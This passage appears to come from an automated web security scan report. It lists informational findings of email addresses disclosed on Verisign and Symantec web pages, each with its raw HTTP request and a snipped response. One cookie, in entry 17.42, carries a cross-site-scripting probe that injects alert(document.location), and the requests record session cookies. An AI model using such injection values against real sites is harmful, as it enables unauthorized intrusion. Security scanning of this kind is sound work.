Issue detail
The following email addresses were disclosed in the response:joshs@santsys.com jsantomieri@verisign.com
Request
GET /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623558|PC#1315621455064-973488.19#1378693698|check#true#1315621758
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:52 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "345a8-71a-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1818 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript .../* InstantService Smart Button Integration VeriSign, Inc Developer: Josh Santomieri (jsantomieri@verisign.com , joshs@santsys.com ) Date: 1/8/2010 Requirements: This script requires jQuery (http://www.jquery.com). */ function SmartButtonHandler() { var self = this; this.parse = function() { $('div[type...[SNIP]...
17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.28. https://knowledge.verisign.com/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
Issue detail
The following email addresses were disclosed in the response:joshs@santsys.com jsantomieri@verisign.com
Request
GET /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:34 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "345a8-71a-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1818 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript .../* InstantService Smart Button Integration VeriSign, Inc Developer: Josh Santomieri (jsantomieri@verisign.com , joshs@santsys.com ) Date: 1/8/2010 Requirements: This script requires jQuery (http://www.jquery.com). */ function SmartButtonHandler() { var self = this; this.parse = function() { $('div[type...[SNIP]...
17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/trust-seal-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/static/prod_plocator_s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /static/prod_plocator_s_code.js HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:41 GMT Content-Type: application/x-javascript Content-Length: 28714 Last-Modified: Fri, 02 Jul 2010 19:50:45 GMT Connection: keep-alive Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ var s_account="symanteccom,veritasnonconsumer,symantecpartner" var s=s_...[SNIP]... =s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;" +"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc ^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t" +";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id...[SNIP]...
17.34. https://policy3.responsys.net/privacy.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/privacy.htm
Issue detail
The following email address was disclosed in the response:
Request
GET /privacy.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/permission.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:06 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "1f21312-1bfd-486ed8d030880" Accept-Ranges: bytes Content-Length: 7165 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Responsys Privacy Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head>...[SNIP]... <a href="mailto:privacy@responsys.com ">privacy@responsys.com </a>...[SNIP]... <a href="mailto:privacy@responsys.com ">privacy@responsys.com </a>...[SNIP]...
17.35. https://press.verisign.com/easyir/customrel.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/easyir/customrel.do
Issue detail
The following email address was disclosed in the response:
Request
GET /easyir/customrel.do HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1286 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]... <b>support@marketwire.com </b>...[SNIP]...
17.36. http://query.verisign.ch/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.37. http://query.verisign.com/cluster.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/cluster.js
Issue detail
The following email address was disclosed in the response:
Request
GET /cluster.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 8783 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc., All Rights Reserved // dspencer@google.com /** * @fileoverview * * This file is for the rendering of Clustered Search results * on the GSA. * * * The flow is: * * - User initiates search query and wants clustered results * * - Res...[SNIP]... * Tested under: * Firefox 1.5.0.7 (Linux) * Firefox 1.5.0.7 (WinXP) * Firefox 1.5.0.4 (Mac OS X 10.4.7) * * IE 6.0... (WinXP SP2) * * Safari (Mac OS X 10.4.7) * * @author dspencer@google.com * * @requires common.js * @requires xmlthtp.js * @requires uri.js */ /** * Name of conceptual clustering servlet in * servlet array in JSON dictionary. */ var CS_CONCEPTS_NAME = 'Concepts';...[SNIP]...
17.38. http://query.verisign.com/common.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/common.js
Issue detail
The following email address was disclosed in the response:
Request
GET /common.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 56081 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // copied from google3/java/com/google/caribou/antlers/fin/jsdata //------------------------------------------------------------------------ // This file contains common utilities and basic javascrip...[SNIP]... ss = token.substring(1, (end != -1) ? end : token.length); } else if (address == "") { name += token; } i += token.length; } // Check if it's a simple email address of the form "jlim@google.com " if (address == "" && name.indexOf("@") != -1) { address = name; name = ""; } name = CollapseWhitespace(name); name = StripQuotes(name, "'"); name = StripQuotes(name, "\""); addre...[SNIP]...
17.39. http://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.40. http://query.verisign.com/uri.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/uri.js
Issue detail
The following email address was disclosed in the response:
Request
GET /uri.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 17596 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc. // All Rights Reserved. /** * @fileoverview * Implements RFC 3986 for parsing/formatting URIs. * * @author msamuel@google.com */ /** * creates a uri from the string form. The parser is relaxed, so special * characters that aren't escaped but don't cause ambiguities will not cause * parse failures. * * @return {URI|Nu...[SNIP]...
17.41. https://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.42. https://renewals.symantec.com/renewals/chat_form.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_form.jsp
Issue detail
The following email address was disclosed in the response:sales@symantecsmbrenewals.com
Request
GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]... <a href="mailto:sales@symantecsmbrenewals.com ">...[SNIP]...
17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/symantec_omniture/s_code_20100217.js
Issue detail
The following email address was disclosed in the response:
Request
GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
